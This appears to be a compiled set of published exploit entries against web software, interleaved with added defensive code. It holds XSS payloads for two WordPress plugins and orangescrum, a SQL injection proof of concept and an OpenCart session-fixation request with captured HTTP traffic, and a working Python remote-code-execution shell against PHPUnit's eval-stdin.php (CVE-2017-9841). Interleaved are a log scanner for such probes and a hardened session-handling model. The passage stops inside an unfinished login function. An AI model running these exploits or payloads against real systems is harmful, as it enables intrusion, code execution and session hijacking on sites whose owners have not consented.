<pre><code># Exploit Title: WordPress Plugin Contact Form Check Tester 1.0.2 - Broken Access Control<br />
# Date: 2/28/2021<br />
# Author: 0xB9<br />
# Software Link: https://wordpress.org/plugins/contact-fo...ck-tester/<br />
# Version: 1.0.2<br />
# Tested on: Windows 10<br />
# CVE: CVE-2021-24247<br />
<br />
1. Description:<br />
The plugin settings are visible to all registered users in the dashboard.<br />
A registered user can leave a payload in the plugin settings.<br />
<br />
2. Proof of Concept:<br />
- Register an account<br />
- Navigate to the dashboard<br />
- Go to CF7 Check Tester -> Settings<br />
- Add a form<br />
- Add a field to the form<br />
- Put a payload in either the Field selector or the Field value: "><script>alert(1)</script><br />
- Save<br />
Anyone who visits the settings page will execute the payload.<br />
<br />
</code></pre>
<pre><code># Exploit Title: orangescrum 1.8.0 - 'Multiple' SQL Injection (Authenticated)<br />
# Date: 28/11/2021<br />
# Exploit Author: Hubert Wojciechowski<br />
# Contact Author: snup.php@gmail.com<br />
# Company: https://redteam.pl<br />
# Vendor Homepage: https://www.orangescrum.org/<br />
# Software Link: https://www.orangescrum.org/<br />
# Version: 1.8.0<br />
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23<br />
<br />
### SQL Injection<br />
<br />
<br />
# Authenticated user<br />
<br />
-----------------------------------------------------------------------------------------------------------------------<br />
# POC<br />
-----------------------------------------------------------------------------------------------------------------------<br />
<br />
## Example vulnerable parameters:<br />
<br />
* project_id<br />
* old_project_id<br />
* uuid<br />
* uniqid<br />
* projid<br />
* id<br />
* caseno<br />
<br />
-----------------------------------------------------------------------------------------------------------------------<br />
-----------------------------------------------------------------------------------------------------------------------<br />
<br />
## Example<br />
<br />
-----------------------------------------------------------------------------------------------------------------------<br />
Req old_project_id=1' - error<br />
-----------------------------------------------------------------------------------------------------------------------<br />
<br />
POST /orangescrum/easycases/move_task_to_project HTTP/1.1<br />
Origin: http://127.0.0.1<br />
Content-Length: 64<br />
Accept-Language: pl,en-US;q=0.7,en;q=0.3<br />
Accept-Encoding: gzip, deflate<br />
Sec-Fetch-Site: same-origin<br />
Host: 127.0.0.1:80<br />
Accept: */*<br />
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0<br />
Connection: close<br />
X-Requested-With: XMLHttpRequest<br />
Sec-Fetch-Mode: cors<br />
Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; LAST_CREATED_PROJ=3; TASKGROUPBY=duedate; ALL_PROJECT=all; CURRENT_FILTER=assigntome; STATUS=2<br />
Referer: http://127.0.0.1/orangescrum/dashboard<br />
Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />
Sec-Fetch-Dest: empty<br />
<br />
project_id=3&old_project_id=2'&case_id=2&case_no=1&is_multiple=0<br />
<br />
-----------------------------------------------------------------------------------------------------------------------<br />
Res:<br />
-----------------------------------------------------------------------------------------------------------------------<br />
<br />
HTTP/1.1 500 Internal Server Error<br />
Date: Sun, 28 Nov 2021 12:42:30 GMT<br />
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40<br />
X-Powered-By: PHP/5.6.40<br />
Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />
Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />
Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />
Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />
Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />
Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />
Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />
Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />
Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />
Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />
Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />
Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />
Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />
Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />
Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />
Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />
Content-Length: 132182<br />
Vary: User-Agent<br />
Expires: access 12 month<br />
Connection: close<br />
[...]<br />
<br />
-----------------------------------------------------------------------------------------------------------------------<br />
Req old_project_id=1'' - not error<br />
-----------------------------------------------------------------------------------------------------------------------<br />
<br />
POST /orangescrum/easycases/move_task_to_project HTTP/1.1<br />
Origin: http://127.0.0.1<br />
Content-Length: 66<br />
Accept-Language: pl,en-US;q=0.7,en;q=0.3<br />
Accept-Encoding: gzip, deflate<br />
Sec-Fetch-Site: same-origin<br />
Host: 127.0.0.1:80<br />
Accept: */*<br />
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0<br />
Connection: close<br />
X-Requested-With: XMLHttpRequest<br />
Sec-Fetch-Mode: cors<br />
Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; LAST_CREATED_PROJ=3; TASKGROUPBY=duedate; ALL_PROJECT=all; CURRENT_FILTER=assigntome; STATUS=2<br />
Referer: http://127.0.0.1/orangescrum/dashboard<br />
Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />
Sec-Fetch-Dest: empty<br />
<br />
project_id=3&old_project_id=2'';&case_id=2&case_no=1&is_multiple=0<br />
<br />
-----------------------------------------------------------------------------------------------------------------------<br />
Res<br />
-----------------------------------------------------------------------------------------------------------------------<br />
<br />
HTTP/1.1 200 OK<br />
Date: Sun, 28 Nov 2021 12:51:23 GMT<br />
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40<br />
X-Powered-By: PHP/5.6.40<br />
Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />
Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />
Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />
Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />
Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />
Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />
Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />
Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />
Vary: User-Agent<br />
Expires: access 12 month<br />
Content-Length: 1<br />
Connection: close<br />
Content-Type: text/html; charset=UTF-8<br />
<br />
0<br />
<br />
</code></pre>
<pre><code># Exploit Title: PHP Unit 4.8.28 - Remote Code Execution (RCE) (Unauthenticated)<br />
# Date: 2022/01/30<br />
# Exploit Author: souzo<br />
# Vendor Homepage: phpunit.de<br />
# Version: 4.8.28<br />
# Tested on: Unit<br />
# CVE : CVE-2017-9841<br />
<br />
import requests<br />
from sys import argv<br />
<br />
# Paths under which a web-exposed vendor/ directory commonly leaves eval-stdin.php reachable<br />
phpfiles = [<br />
    "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",<br />
    "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",<br />
    "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",<br />
    "/laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",<br />
    "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",<br />
    "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",<br />
]<br />
<br />
HEADERS = {<br />
    "Content-Type": "text/html",<br />
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0",<br />
}<br />
<br />
def check_vuln(site):<br />
    # Returns the reachable eval-stdin.php URL, or False if no candidate path answered with the marker<br />
    vuln = False<br />
    try:<br />
        for i in phpfiles:<br />
            url = site + i  # build each candidate from the base URL, not from the previous candidate<br />
            req = requests.get(url, headers=HEADERS, data="<?php echo md5(phpunit_rce); ?>")<br />
            if "6dd70f16549456495373a337e6708865" in req.text:<br />
                print(f"Vulnerable: {url}")<br />
                return url<br />
    except Exception:<br />
        pass<br />
    return vuln<br />
<br />
def help():<br />
    exit(f"{argv[0]} <site>")<br />
<br />
def main():<br />
    if len(argv) < 2:<br />
        help()<br />
    if "http" not in argv[1] or ":" not in argv[1] or "/" not in argv[1]:<br />
        help()<br />
    site = argv[1]<br />
    if site.endswith("/"):<br />
        site = site[:-1]  # drop a trailing slash so the paths above join cleanly<br />
<br />
    pathvuln = check_vuln(site)<br />
    if not pathvuln:<br />
        exit("Not vuln")<br />
    try:<br />
        while True:<br />
            cmd = input("> ")<br />
            req = requests.get(str(pathvuln), headers=HEADERS, data=f'<?php system(\'{cmd}\') ?>')<br />
            print(req.text)<br />
    except Exception as ex:<br />
        exit("Error: " + str(ex))<br />
<br />
main()<br />
</code></pre>
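The detection side of the script above, as an added example (not code from the exploit or from PHPUnit): a scanner over web-server access-log lines in combined format that flags any request for eval-stdin.php whatever the vendor/ prefix, generalising the six paths the script probes, and rates a 2xx answer as critical because the file then evaluates the request body as PHP. The log lines, IPs and the severity scale are constructed for the example.

```python
import re
from collections import Counter
from typing import Dict, List, Optional

# Constant tail of every path the exploit probes; only the vendor/ prefix varies per framework.
EVAL_STDIN_TAIL = "/phpunit/phpunit/src/util/php/eval-stdin.php"

# Combined log format: ip ident user [ts] "METHOD path PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Return a finding if the request targets eval-stdin.php, else None."""
    path = entry["path"].split("?", 1)[0].lower()  # drop query string, match case-insensitively
    if not path.endswith(EVAL_STDIN_TAIL):
        return None
    status = int(entry["status"])
    if 200 <= status < 300:
        # The file answered. eval-stdin.php evaluates the request body as PHP, so a
        # reachable copy means unauthenticated code execution; treat as a compromise.
        severity = "critical"
    elif status in (401, 403, 404):
        severity = "info"      # probe blocked or file absent: scanning activity only
    else:
        severity = "warning"   # e.g. 500: the file may exist but the request failed
    return {"ip": entry["ip"], "ts": entry["ts"], "method": entry["method"],
            "path": entry["path"], "status": entry["status"], "severity": severity}


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Run the detector over raw log lines, skipping unparsable ones."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        finding = classify(entry)
        if finding is not None:
            findings.append(finding)
    return findings


def probes_by_source(findings: List[Dict[str, str]]) -> Dict[str, int]:
    """Count eval-stdin.php requests per source IP, useful for blocking decisions."""
    return dict(Counter(f["ip"] for f in findings))


# Constructed sample lines (not real traffic); IPs are from documentation ranges.
SAMPLE_LOG = [
    '203.0.113.9 - - [30/Jan/2022:10:15:02 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 32 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [30/Jan/2022:10:15:03 +0000] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [30/Jan/2022:10:16:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [30/Jan/2022:10:16:05 +0000] "POST /app/Vendor/PHPUnit/phpunit/src/Util/PHP/eval-stdin.php?x=1 HTTP/1.1" 500 0 "-" "curl/7.68.0"',
    'this line is not in combined format',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['severity']:8} {f['ip']:14} {f['status']} {f['method']} {f['path']}")
    print(probes_by_source(scan(SAMPLE_LOG)))
```

A 2xx hit is worth treating as an incident rather than a scan: the same request would have carried a PHP body, and access logs do not record it.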
<pre><code># Exploit Title: orangescrum 1.8.0 - 'Multiple' Cross-Site Scripting (XSS) (Authenticated)<br />
# Date: 28/11/2021<br />
# Exploit Author: Hubert Wojciechowski<br />
# Contact Author: snup.php@gmail.com<br />
# Company: https://redteam.pl<br />
# Vendor Homepage: https://www.orangescrum.org/<br />
# Software Link: https://www.orangescrum.org/<br />
# Version: 1.8.0<br />
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23<br />
<br />
### XSS Reflected<br />
<br />
<br />
# Authenticated user<br />
<br />
-----------------------------------------------------------------------------------------------------------------------<br />
# POC<br />
-----------------------------------------------------------------------------------------------------------------------<br />
<br />
## Example XSS Reflected<br />
<br />
Param: projid<br />
-----------------------------------------------------------------------------------------------------------------------<br />
Req<br />
-----------------------------------------------------------------------------------------------------------------------<br />
<br />
POST /orangescrum/easycases/edit_reply HTTP/1.1<br />
Host: 127.0.0.1<br />
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0<br />
Accept: */*<br />
Accept-Language: pl,en-US;q=0.7,en;q=0.3<br />
Accept-Encoding: gzip, deflate<br />
Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />
X-Requested-With: XMLHttpRequest<br />
Content-Length: 64<br />
Origin: http://127.0.0.1<br />
Connection: close<br />
Referer: http://127.0.0.1/orangescrum/dashboard<br />
Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; CURRENT_FILTER=cases<br />
Sec-Fetch-Dest: empty<br />
Sec-Fetch-Mode: cors<br />
Sec-Fetch-Site: same-origin<br />
<br />
id=5&reply_flag=1&projid=1zxcvczxzxcv"><script>alert(1)</script><br />
<br />
-----------------------------------------------------------------------------------------------------------------------<br />
Res:<br />
-----------------------------------------------------------------------------------------------------------------------<br />
<br />
HTTP/1.1 200 OK<br />
Date: Sun, 28 Nov 2021 13:28:57 GMT<br />
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40<br />
X-Powered-By: PHP/5.6.40<br />
Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1<br />
Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1<br />
Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1<br />
Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1<br />
Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1<br />
Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1<br />
Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1<br />
Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1<br />
Content-Length: 1114<br />
Vary: User-Agent<br />
Expires: access 12 month<br />
Connection: close<br />
Content-Type: text/html; charset=UTF-8<br />
<br />
<table cellpadding="0" cellspacing="0" class="edit_rep_768 col-lg-12"><br />
 <tr><br />
 <td><br />
 <textarea name="edit_reply_txtbox5" id="edit_reply_txtbox5" rows="3" class="reply_txt_ipad col-lg-12"><br />
 xczcxz"/><b>bb</b>bbxczcxz"/>&ltxczcxz"/><b>bb</b>bb;b>bb</b>bbxczcxz"/><b>bb</b>bb </textarea><br />
 </td><br />
 </tr><br />
 <tr><br />
 <td align="right"><br />
 <div id="edit_btn5" class="fr"><br />
 <button type="button" value="Save" style="margin:5px;padding:3px 32px 3px 32px;" class="btn btn_blue" onclick="save_editedvalue_reply(2,5,1zxcvczxzxcv"><script>alert(1)</script>,'c64271510399996f611739b<br />
[...]<br />
<br />
<br />
## Example XSS Stored<br />
<br />
Example vulnerable parameters:<br />
* CS_message<br />
* name<br />
* data[User][email]<br />
<br />
-----------------------------------------------------------------------------------------------------------------------<br />
Param: CS_message<br />
-----------------------------------------------------------------------------------------------------------------------<br />
Req<br />
-----------------------------------------------------------------------------------------------------------------------<br />
<br />
POST /orangescrum/easycases/ajaxpostcase HTTP/1.1<br />
Host: 127.0.0.1<br />
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0<br />
Accept: application/json, text/javascript, */*; q=0.01<br />
Accept-Language: pl,en-US;q=0.7,en;q=0.3<br />
Accept-Encoding: gzip, deflate<br />
Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />
X-Requested-With: XMLHttpRequest<br />
Content-Length: 393<br />
Origin: http://127.0.0.1<br />
Connection: close<br />
Referer: http://127.0.0.1/orangescrum/dashboard/?project=3966c2c5cc3745d161640d07450d682c<br />
Cookie: language=en-gb; currency=USD; CAKEPHP=j27a7es1lv1ln77gpngicqshe4; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; TASKGROUPBY=duedate; CURRENT_FILTER=cases; TASK_TYPE_IN_DASHBOARD=1; LAST_CREATED_PROJ=14<br />
Sec-Fetch-Dest: empty<br />
Sec-Fetch-Mode: cors<br />
Sec-Fetch-Site: same-origin<br />
<br />
pid=14&CS_project_id=8f4adc0f496a3738f04d629be909488d&CS_istype=2&CS_title=&CS_type_id=15&CS_priority=1&CS_message=zxcvbzz"/><img%20src=x%20onmouseover=alert(1)>axcbv&CS_assign_to=1&CS_due_date=&CS_milestone=&postdata=Post&pagename=dashboard&emailUser%5B%5D=1&CS_id=2678&CS_case_no=1&datatype=1&CS_legend=2&prelegend=1&hours=0&estimated_hours=0&completed=0&taskid=0&task_uid=0&editRemovedFile=<br />
<br />
-----------------------------------------------------------------------------------------------------------------------<br />
Res:<br />
-----------------------------------------------------------------------------------------------------------------------<br />
<br />
HTTP/1.1 200 OK<br />
Date: Sun, 28 Nov 2021 13:51:29 GMT<br />
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40<br />
X-Powered-By: PHP/5.6.40<br />
Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />
Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />
Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />
Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1<br />
Vary: User-Agent<br />
Expires: access 12 month<br />
Content-Length: 698<br />
Connection: close<br />
Content-Type: text/html; charset=UTF-8<br />
<br />
{"success":"success","pagename":"dashboard","formdata":"8f4adc0f496a3738f04d629be909488d","postParam":"Post","caseUniqId":"eb8671bf1e20702b7793b11152e9ff32","format":2,"allfiles":null,"caseNo":"1","emailTitle":"aaaaaaaaaaaaaaz\"\/><img src=x onmouseover=alert(1)>a","emailMsg":"zxcvbzz\"\/><img src=x onmouseover=alert(1)><br />
[...]<br />
<br />
</code></pre>
<pre><code># Exploit Title: WordPress Plugin Domain Check 1.0.16 - Reflected Cross-Site Scripting (XSS) (Authenticated)<br />
# Date: 30-10-2021<br />
# Exploit Author: Ceylan Bozogullarindan<br />
# Author Webpage: https://bozogullarindan.com<br />
# Vendor Homepage: https://domaincheckplugin.com/<br />
# Software Link: https://wordpress.org/plugins/domain-check/<br />
# Version: 1.0.16<br />
# Tested on: Linux<br />
# CVE: CVE-2021-24926 (https://wpscan.com/vulnerability/8cc7cbbd-f74f-4f30-9483-573641fea733)<br />
<br />
<br />
# Description:<br />
<br />
Domain Check is a WordPress plugin that allows you to see which domains and SSL certificates are coming up for expiration and to quickly locate the coupons, coupon codes, and deals from your favorite sites before renewing.<br />
<br />
An authenticated user is able to inject arbitrary JavaScript or HTML code into the "Domain Check Profile" interface available on the plugin's settings page, due to incorrect sanitization of user-supplied data, and achieve a Reflected Cross-Site Scripting attack against administrators. Plugin versions prior to 1.0.16 are affected by this vulnerability.<br />
<br />
<br />
The details of the discovery are given below.<br />
<br />
<br />
# Steps To Reproduce:<br />
1. Visit the following page after signing in to the administrator panel: http://vulnerable-wordpress-website/wp-admin/admin.php?page=domain-check-profile&domain=hacked.foo<script>alert(1)</script><br />
2. The XSS will be triggered on the settings page.<br />
<br />
</code></pre>
<pre><code># Exploit Title: opencart 3.0.3.8 - Session Injection<br />
# Date: 28/11/2021<br />
# Exploit Author: Hubert Wojciechowski<br />
# Contact Author: snup.php@gmail.com<br />
# Company: https://redteam.pl<br />
# Vendor Homepage: https://www.opencart.com/<br />
# Software Link: https://www.opencart.com/<br />
# Version: 3.0.3.8<br />
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23<br />
<br />
### Session Fixation / Injection<br />
<br />
The session cookie "OCSESSID" is improperly processed.<br />
An attacker can set the cookie to any value and the server adopts that value as the session ID.<br />
Because of that, the application is vulnerable to session injection and session fixation.<br />
<br />
-----------------------------------------------------------------------------------------------------------------------<br />
# POC<br />
-----------------------------------------------------------------------------------------------------------------------<br />
<br />
## Example<br />
<br />
Modify the "OCSESSID" cookie value:<br />
-----------------------------------------------------------------------------------------------------------------------<br />
Req<br />
-----------------------------------------------------------------------------------------------------------------------<br />
<br />
GET /opencart-3.0.3.8/index.php?route=product/category&path=20_26 HTTP/1.1<br />
Host: 127.0.0.1<br />
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />
Accept-Language: pl,en-US;q=0.7,en;q=0.3<br />
Accept-Encoding: gzip, deflate<br />
Connection: close<br />
Referer: http://127.0.0.1/opencart-3.0.3.8/<br />
Cookie: language=en-gb; currency=USD; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USERSUB_TYPE=0; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=mydashboard; LISTVIEW_TYPE=comfort; TASKGROUPBY=duedate; TASK_TYPE_IN_DASHBOARD=10; CURRENT_FILTER=cases; DASHBOARD_ORDER=1_1%3A%3A1%2C2%2C3%2C5%2C6%2C8%2C9; CAKEPHP=ommpvclncs2t37j8tsep486ig5; OCSESSID=zxcvzxcvzxcvzxcvzxcvzxcv<br />
Upgrade-Insecure-Requests: 1<br />
Sec-Fetch-Dest: document<br />
Sec-Fetch-Mode: navigate<br />
Sec-Fetch-Site: same-origin<br />
Sec-Fetch-User: ?1<br />
<br />
-----------------------------------------------------------------------------------------------------------------------<br />
The server sets the attacker-supplied value:<br />
<br />
Res:<br />
-----------------------------------------------------------------------------------------------------------------------<br />
<br />
HTTP/1.1 200 OK<br />
Date: Sun, 28 Nov 2021 15:16:06 GMT<br />
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11<br />
X-Powered-By: PHP/8.0.11<br />
Set-Cookie: OCSESSID=zxcvzxcvzxcvzxcvzxcvzxcv; path=/<br />
Connection: close<br />
Content-Type: text/html; charset=utf-8<br />
Content-Length: 18944<br />
[...]<br />
</code></pre>
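The OCSESSID handling above modelled in Python, as an added example (this is not OpenCart's code): `resolve_vulnerable` adopts whatever id the client sends, which is what the Set-Cookie in the response shows, while `resolve_hardened` only honours an id the server itself issued and `login` rotates it on authentication. The 32-hex id format and the in-memory store are assumptions for the example; note that a format check alone would still accept the PoC value, which is plain alphanumerics, so the existence check is the part that actually stops fixation.

```python
import re
import secrets
from typing import Dict, Optional

# Assumed id format for this example (32 lowercase hex chars from secrets.token_hex(16));
# OpenCart's real id format and session storage are not modelled here.
SESSION_ID_RE = re.compile(r"^[0-9a-f]{32}$")


class SessionStore:
    """Minimal in-memory, server-side session store keyed by session id."""

    def __init__(self) -> None:
        self._sessions: Dict[str, dict] = {}

    def new_id(self) -> str:
        sid = secrets.token_hex(16)   # unpredictable id chosen by the server only
        self._sessions[sid] = {}
        return sid

    def exists(self, sid: str) -> bool:
        return sid in self._sessions

    def data(self, sid: str) -> dict:
        return self._sessions[sid]

    def destroy(self, sid: str) -> None:
        self._sessions.pop(sid, None)


def resolve_vulnerable(store: SessionStore, cookie_value: Optional[str]) -> str:
    """The behaviour in the capture: any OCSESSID the client sends is adopted as-is
    and a session is created under it, so the attacker chooses the victim's id."""
    sid = cookie_value if cookie_value else store.new_id()
    store._sessions.setdefault(sid, {})
    return sid


def resolve_hardened(store: SessionStore, cookie_value: Optional[str]) -> str:
    """Honour a client-supplied id only if it is well-formed AND was issued by this
    server; anything else gets a fresh id. The PoC value is plain alphanumerics, so a
    format check alone would not reject it; the existence check is what stops fixation."""
    if cookie_value and SESSION_ID_RE.match(cookie_value) and store.exists(cookie_value):
        return cookie_value
    return store.new_id()


def login(store: SessionStore, sid: str, user: str) -> str:
    """Rotate the id on authentication so a pre-login id that an attacker may know
    (even a legitimately issued one) never becomes an authenticated session."""
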